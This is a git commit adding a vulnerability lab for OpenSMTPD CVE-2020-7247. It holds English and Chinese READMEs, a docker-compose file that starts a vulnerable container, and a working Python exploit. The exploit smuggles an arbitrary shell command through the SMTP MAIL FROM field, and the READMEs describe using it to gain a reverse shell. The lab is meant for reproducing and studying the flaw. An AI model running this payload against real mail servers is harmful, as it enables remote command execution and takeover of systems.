first commit

opensmtpd/CVE-2020-7247/README.md

@@ -0,0 +1,41 @@
+# OpenSMTPD Remote Code Execution Vulnerability (CVE-2020-7247)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+OpenSMTPD is an smtp service program for unix operating systems (BSD, MacOS, GNU/Linux), following the RFC 5321 SMTP protocol. OpenSMTPD was originally developed for the OpenBSD operating system and is part of the OpenBSD project. Due to its open source properties, Distributed to other unix platforms. According to the ISC license, the software is free for everyone to use and reuse.
+
+`CVE-2020-7247` is caused by OpenSMTPD's lax verification of the sender/recipient in the process of implementing RFC 5321.
+
+On January 29, 2020, OpenSMTPD group officially submitted a fix for the `CVE-2020-7247` in the GitHub repository. After the repair, the corresponding version is `OpenSMTPD 6.6.2p1`.
+
+**Reference：**
+
+- https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
+- https://www.exploit-db.com/exploits/47984
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7247
+- https://www.anquanke.com/post/id/197689
+
+## Start Vulnerability Application
+
+Start a vulnerable OpenSMTPD through following command:
+
+```
+docker compose up -d
+```
+
+After SMTPD server is started, connect to the 8825 port and get the result (`44dadcc5a6eb` is the container ID):
+
+```
+$ nc <your-ip> 8825 -v
+220 44dadcc5a6eb ESMTP OpenSMTPD
+```
+
+## Vulnerability Reproduce
+
+Use [Exploit-DB](https://www.exploit-db.com/exploits/47984) to gain a reverse shell:
+
+```
+python3 poc.py your-ip 8825 <command> 
+```
+
+![image](https://github.com/CatAndCoffee/vulhub/blob/CVE-2020-7247/OpenSMTPD/CVE-2020-7247/image-20210415233036042.png)

opensmtpd/CVE-2020-7247/README.zh-cn.md

@@ -0,0 +1,40 @@
+# OpenSMTPD 远程命令执行漏洞 (CVE-2020-7247)
+
+OpenSMTPD 是面向 unix 操作系统 (BSD, MacOS, GNU/Linux) 的一个 smtp 服务程序，遵循 RFC 5321 SMTP 协议，OpenSMTPD 最初是为 OpenBSD 操作系统开发的，是 OpenBSD 项目的一部分，由于其开源的特性，进而分发到了其他 unix 平台。根据 ISC 许可，该软件可免费供所有人使用和重用。
+
+`CVE-2020-7247` 是 OpenSMTPD 在实现 RFC 5321 的过程中对 发件人/收件人 校验不严而导致的。
+
+2020年01月29日，OpenSMTPD 官方在 github 代码仓库提交了针对 `CVE-2020-7247` 漏洞的修复，修复后对应版本为`OpenSMTPD 6.6.2p1`。
+
+参考链接：
+
+- https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
+- https://www.exploit-db.com/exploits/47984
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7247
+- https://www.anquanke.com/post/id/197689
+
+## 环境搭建
+
+执行如下命令，启动OpenSMTPD服务
+
+```
+docker compose up -d
+```
+
+执行完成后，使用`nc <your-ip> 8825 -v` 后应看到如下回显：（`44dadcc5a6eb`为容器编号）
+
+```
+220 44dadcc5a6eb ESMTP OpenSMTPD
+```
+
+## 漏洞复现
+
+使用[Exploit-DB](https://www.exploit-db.com/exploits/47984)上的POC进行复现：
+
+```
+python3 poc.py your-ip 8825 <command> 
+```
+
+反弹shell：
+
+![image](1.png)

opensmtpd/CVE-2020-7247/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+  smtpd:
+    image: vulhub/opensmtpd:6.6.1p1
+    ports:
+      - "8825:25"

opensmtpd/CVE-2020-7247/poc.py

@@ -0,0 +1,68 @@
+# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution
+# Date: 2020-01-29
+# Exploit Author: 1F98D
+# Original Author: Qualys Security Advisory
+# Vendor Homepage: https://www.opensmtpd.org/
+# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
+# Version: OpenSMTPD < 6.6.2
+# Tested on: Debian 9.11 (x64)
+# CVE: CVE-2020-7247
+# References:
+# https://www.openwall.com/lists/oss-security/2020/01/28/3
+#
+# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
+# escape dangerous characters from user-controlled input. An attacker
+# can exploit this to execute arbitrary shell commands on the target.
+# 
+#!/usr/local/bin/python3
+
+from socket import *
+import sys
+
+if len(sys.argv) != 4:
+    print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
+    print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
+    sys.exit(1)
+
+ADDR = sys.argv[1]
+PORT = int(sys.argv[2])
+CMD = sys.argv[3]
+
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((ADDR, PORT))
+
+res = s.recv(1024)
+if 'OpenSMTPD' not in str(res):
+    print('[!] No OpenSMTPD detected')
+    print('[!] Received {}'.format(str(res)))
+    print('[!] Exiting...')
+    sys.exit(1)
+
+print('[*] OpenSMTPD detected')
+s.send(b'HELO x\r\n')
+res = s.recv(1024)
+if '250' not in str(res):
+    print('[!] Error connecting, expected 250')
+    print('[!] Received: {}'.format(str(res)))
+    print('[!] Exiting...')
+    sys.exit(1)
+
+print('[*] Connected, sending payload')
+s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
+res = s.recv(1024)
+if '250' not in str(res):
+    print('[!] Error sending payload, expected 250')
+    print('[!] Received: {}'.format(str(res)))
+    print('[!] Exiting...')
+    sys.exit(1)
+
+print('[*] Payload sent')
+s.send(b'RCPT TO:<root>\r\n')
+s.recv(1024)
+s.send(b'DATA\r\n')
+s.recv(1024)
+s.send(b'\r\nxxx\r\n.\r\n')
+s.recv(1024)
+s.send(b'QUIT\r\n')
+s.recv(1024)
+print('[*] Done')